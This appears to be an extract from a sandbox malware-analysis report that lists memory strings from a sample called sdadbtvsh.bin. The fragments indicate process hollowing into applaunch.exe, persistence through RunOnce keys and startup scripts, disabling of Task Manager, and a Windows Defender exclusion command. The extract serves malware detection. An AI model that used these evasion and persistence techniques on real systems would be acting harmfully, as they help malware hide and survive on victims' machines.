memstr_4b2d79ac-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: batwrite) |
memstr_3a0757cd-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbsclose8 |
memstr_3f160631-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runoncew |
memstr_01a2dc6d-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbswritef |
memstr_ea4d0f31-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: batclose |
memstr_04b59799-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup |
memstr_51768f26-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_path; |
memstr_4b5821e7-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_pathrtcut |
memstr_04772d44-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\wi |
memstr_98db566c-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup2version\runonc |
memstr_d720381c-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_pathv |
memstr_15822562-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: antitaskp |
memstr_9f303e67-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: pqgiogoraarleguqldnvhv.exe- |
memstr_bc04aeee-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_iswow64process: |
memstr_93d69d38-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_unmapviewofsection3 |
memstr_d2a6bd24-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_allocateexespace |
memstr_75a408f7-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tbinary_iswow64processk |
memstr_f36408f0-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: zpsers\user\temp\wgsr.msc@ |
memstr_1a739850-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\windows\system32\msctf.dllv |
memstr_d44156c7-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_iswow64procession |
memstr_7e1a3a86-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: orleql |
memstr_0019bda9-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: p~kpp |
memstr_fe80db5c-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: psers\user\temp\wgsr.msc |
memstr_1c4f5615-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: pqgiogoraarleguqldnvhv.exe |
memstr_aa1320be-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\windows\system32\wldp.dlloc |
memstr_68fed33b-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\windows\system32\ntmarta.dll |
memstr_ced7edc8-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommittotalfreethreshold4 |
memstr_d2213020-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemmajorversionoldy |
memstr_40d49742-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemminorversionexe |
memstr_79bb2735-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: majoroperatingsystemversion |
memstr_a2c7872b-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemoryheaponh |
memstr_f2a0d36a-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommittotalfreethresholda |
memstr_3683d935-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommitfreeblockthreshold~ |
memstr_b76b9c14-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemmajorversionw |
memstr_17c30e68-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommitfreeblockthresholdl |
memstr_dc5931cc-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: poptionalheaderimagebasenewe |
memstr_e09abb44-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemoryheapsholdr |
memstr_1cf7ca16-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readimagefileexecoptionsshold |
memstr_97646e5c-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemorybaseon |
memstr_2aeec6ab-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hrt\se |
memstr_5dbaaffe-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemminorversiony |
memstr_a4229e41-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlystaticserverdatanold |
memstr_883880c2-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: r_<r_<@6p |
memstr_7217a792-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ioptionalheadersizeofheadersnew |
memstr_ec8ca2cb-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ioptionalheadersizeofimagenew |
memstr_86718e50-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readimagefileexecoptions |
memstr_63cf842f-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: minoroperatingsystemversion |
memstr_2c94f8e8-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlystaticserverdata |
memstr_b5703b2c-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemorybase |
memstr_c9b658e9-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start.cmd" |
memstr_d4d1beea-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: settingsfn. |
memstr_c88a9791-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder! |
memstr_663e1706-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: byte[uctcreate8 |
memstr_2fe1499b-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_path3 |
memstr_c01e2a2f-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @echo off |
memstr_e0dd84b9-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variables |
memstr_dc3caedc-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folderi |
memstr_7257dd99-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settingsfile, hidd` |
memstr_f6a107ea-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder{ |
memstr_00395157-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: disabletaskmgr\microsou |
memstr_64d8281f-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variablesl |
memstr_d176d7b8-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \start.cmd^ |
memstr_8c9cfca2-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settingseturn = trq |
memstr_d123d186-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variablesnary |
memstr_1dce7744-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupdir |
memstr_15e26afd-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: cmd_command_path |
memstr_bd94e64e-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: disabletaskmgr |
memstr_4b895928-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \start.cmd |
memstr_832abf10-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \mshta.exe |
memstr_9539e917-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: wscript.quit |
memstr_7fbafc5b-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_foldercreateob |
memstr_6190afe8-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variablesciiarray |
memstr_4476b9b8-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dword;int;dword;struct;ptr;int;int;int;ptr;endstruct, |
memstr_ef3387c4-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: const waitonreturn = true |
memstr_c8789ef7-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: -command add-mppreference -exclusionpath |
memstr_9b7804f7-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dword pointertosymboltable;ebx; dword edx; dword ecx; { |
memstr_8444f224-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: word sizeofoptionalheader;j |
memstr_be4adb53-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: set wshshell = wscript.createobject(e |
memstr_3b80c087-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \microsoft.net\framework\v4.0.30319\applaunch.exet |
memstr_47f964cc-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dword addressofnewexeheadert64 p2home; uint64 p3home; |
memstr_b359621b-a |